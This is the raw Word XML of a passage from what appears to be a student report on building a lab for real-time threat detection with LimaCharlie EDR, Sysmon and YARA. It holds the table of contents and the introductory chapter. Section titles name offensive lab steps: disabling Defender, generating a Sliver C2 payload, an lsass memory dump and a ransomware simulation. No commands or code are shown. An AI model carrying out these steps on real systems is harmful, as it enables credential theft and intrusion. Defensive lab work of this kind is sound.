          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………..…39</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5.3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Permanently Disable Defender via Group Policy Editor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………..…..40</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5.3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Permanently Disable Defender via Registry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………...40</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5.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disable Defender Services via Registry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>……………………………………..41</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5.3.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prevent Standby Mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………………42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="600" w:firstLineChars="25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5.3.6 Configure Sysmon…………………………………………………………...43</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5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installing LimaCharlie EDR and Configuring Sensor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………….…45</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240" w:firstLineChars="10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5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Setting Up Attack System on Ubuntu VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Generating C2 Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>….……….48</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240" w:firstLineChars="10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5.6 Transferring C2 Payload and Starting C2 Session…………….………………..…50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240" w:firstLineChars="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conducting lsass.exe Memory Dump Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………..….55</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240" w:firstLineChars="10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5.8 Conducting Ransomware Attack &amp; Detection and Response……………………..59</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240" w:firstLineChars="10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 Automated YARA Scanning Implementation………………………………….….62</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5.9.1 Adding YARA signature for the Sliver C2 payload………………………....62</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5.9.2 Setting Up Generic D&amp;R Rules for YARA Detection Alerts……………….64</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5.9.3 Automatically YARA scan downloaded EXEs……………………………...66</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5.9.4 Automatic YARA scan processes launched from Downloads directory…....67</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5.9.5 Scanning New EXEs in Downloads…………………………………………68</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="600" w:firstLineChars="25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5.9.6 Scanning processes launched from Downloads……………………………..68</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>……………………………………………….……69</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6.1 Applications of Real-Time Threat Detection and Response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………69</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6.2 Future Scope and Enhancements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………..69</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240" w:firstLineChars="10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6.3 Lessons Learned and Insights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………..…70</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="0" w:num="1"/>
          <w:rtlGutter w:val="0"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>EFERENCES……………………………………………………………72</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="315884"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="315884"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Chapter 1: Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:num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Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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today's interconnected world, cybersecurity has emerged as a paramount concern amidst the rapid evolution of digital technologies. While advancements in cloud computing, mobile technology, and artificial intelligence have ushered in unprecedented convenience and efficiency, they've also expanded the attack surface for cyber threats. Threat actors, ranging from hackers to nation-state adversaries, exploit vulnerabilities in digital systems and networks, posing risks of data breaches, financial losses, and reputational damage. Traditional security measures, though foundational, often fall short in addressing the dynamic nature of modern cyber threats, leaving organizations vulnerable to sophisticated attacks.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To combat these challenges, organizations are shifting towards holistic cybersecurity strategies that encompass prevention, detection, response, and recovery capabilities. By leveraging advanced technologies, threat intelligence, and proactive threat hunting methodologies, organizations can bolster their cyber resilience and mitigate the risks posed by evolving cyber threats. Real-time threat detection and response systems play a pivotal role in this endeavor, enabling organizations to detect, analyze, and respond to cyber threats promptly, thereby safeguarding digital assets and critical infrastructure and ensuring business continuity in the face of cyber adversity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>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Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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today's cybersecurity landscape, organizations grapple with the daunting task of swiftly detecting and effectively responding to cyber threats. Despite advancements in cybersecurity technologies, traditional security solutions often prove insufficient in safeguarding against the dynamic and sophisticated nature of modern cyber attacks. A primary challenge stems from the reliance on static, signature-based detection methods, which struggle to identify novel and mutating threats like zero-day exploits and polymorphic malware. Consequently, security teams contend with alert fatigue, as the sheer volume of security alerts inundates them, making it difficult to discern genuine threats amidst false positives and low-priority events. This reactive approach, compounded by the lack of contextual intelligence and proactive threat hunting capabilities, leaves organizations vulnerable to undetected or unresolved security incidents, heightening the risk of data breaches, financial losses, and reputational damage.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Addressing these challenges necessitates a shift towards dynamic and proactive threat detection mechanisms that can adapt to the evolving threat landscape. Real-time visibility into digital assets and networks, coupled with advanced analytics and machine learning algorithms, is imperative to detect subtle indicators of compromise and unauthorized activity. Moreover, there is a growing demand for integrated and automated threat detection and response solutions that can correlate security events across disparate sources, prioritize alerts, and orchestrate remediation actions in a coordinated manner. By embracing proactive, intelligence-driven cybersecurity strategies, organizations can bolster their defenses, stay ahead of adversaries, and protect their digital assets from emerging cyber risks.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1.3 Objectives</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primary objectives of this project are outlined below:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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1)</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Develop a Real-Time Threat Detection and Response System:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Design and implement a comprehensive solution capable of detecting and responding to cyber threats in real-time, capable of identifying and neutralizing cyber threats as they emerge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Utilize advanced cybersecurity techniques, including behavioral analysis, anomaly detection, and threat intelligence integration, to enhance the accuracy and effectiveness of threat detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Develop automated response mechanisms to mitigate identified threats promptly, including isolating compromised systems, blocking malicious activities, and alerting security personnel.</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0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left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2)</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Implement Advanced Cybersecurity Techniques and Tools:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Explore and deploy cutting-edge cybersecurity technologies and tools to bolster the resilience of digital infrastructure against a diverse range of attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Leverage next-generation endpoint protection solutions, network intrusion detection systems (NIDS), and security information and event management (SIEM) platforms to provide comprehensive visibility and control over digital assets and networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Incorporate threat intelligence feeds, sandboxing capabilities, and machine learning algorithms to proactively identify and mitigate emerging cyber threats before they can inflict significant harm.</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0"/>
        </w:num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3)</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Establish a Simulated Cyber Environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Set up a realistic cyber environment comprising both attacker and victim systems to simulate real-world cyber attack scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Deploy virtualized infrastructure using hypervisor technologies such as VirtualBox or VMware to emulate diverse computing environments, including desktops, servers, and network devices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Create scripted attack scenarios and threat scenarios to simulate various cyber threats, including malware infections, phishing attacks, ransomware, and advanced persistent threats (APTs).</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0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left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4)</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Evaluate the Effectiveness of the Threat Detection and Response System:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Conduct rigorous testing and evaluation of the developed threat detection and response system against a wide range of cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Measure the system's performance in terms of detection accuracy, false positive rates, response time, and overall effectiveness in mitigating cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Analyze the system's capabilities in detecting and responding to different types of cyber attacks, including malware infections, unauthorized access attempts, data breaches, and insider threats.</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0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left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5)</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Provide Insights into Best Practices for Cybersecurity Analysts and Organization:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Document and share insights gained from the project's research, experimentation, and analysis to inform cybersecurity practitioners and organizations about emerging cyber threats and effective defense strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Develop practical guidelines, recommendations, and best practices for cybersecurity analysts and organizations to enhance their cyber defense posture and incident response capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Promote knowledge sharing and collaboration within the cybersecurity community to foster a culture of continuous learning, adaptation, and improvement in combating cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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1.4 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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project is focused on the development and implementation of a comprehensive real-time threat detection and response framework designed to address the evolving cybersecurity challenges encountered in modern computing environments. The scope of the project encompasses the following key components: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1)</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Setting up a Simulated Cyber Environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Utilizing virtualization technologies, such as VirtualBox or VMware, to create a simulated cyber environment consisting of both attacker and victim systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Configuring virtual machines (VMs) to emulate diverse computing environments, including desktops, servers, and network infrastructure, to accurately replicate real-world cyber attack scenarios.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2)</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Leveraging Open-Source Cybersecurity Tools and Frameworks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Leveraging a variety of open-source cybersecurity tools and frameworks to facilitate threat detection and response capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Key tools and frameworks include, but are not limited to, the Sliver C2 framework for command and control, Sysmon for advanced endpoint monitoring, LimaCharlie EDR for endpoint detection and response, and YARA for malware identification and analysis.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3)</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Conducting Cyber Attack Simulations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Designing and executing a series of cyber attack simulations to evaluate the effectiveness of the developed threat detection and response mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Simulated cyber attacks may include, but are not limited to, lsass.exe memory dump attacks, ransomware attacks, phishing campaigns, and advanced persistent threats (APTs).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4)</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Assessing Efficacy of Detection and Response Mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Assessing the performance and efficacy of the threat detection and response mechanisms in mitigating various types of cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Evaluating key metrics such as detection accuracy, false positive rates, response time, and overall effectiveness in thwarting cyber attacks.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5)</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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Providing Documentation and Guidelines:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Documenting the project's methodology, architecture, implementation details, and findings in a comprehensive report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
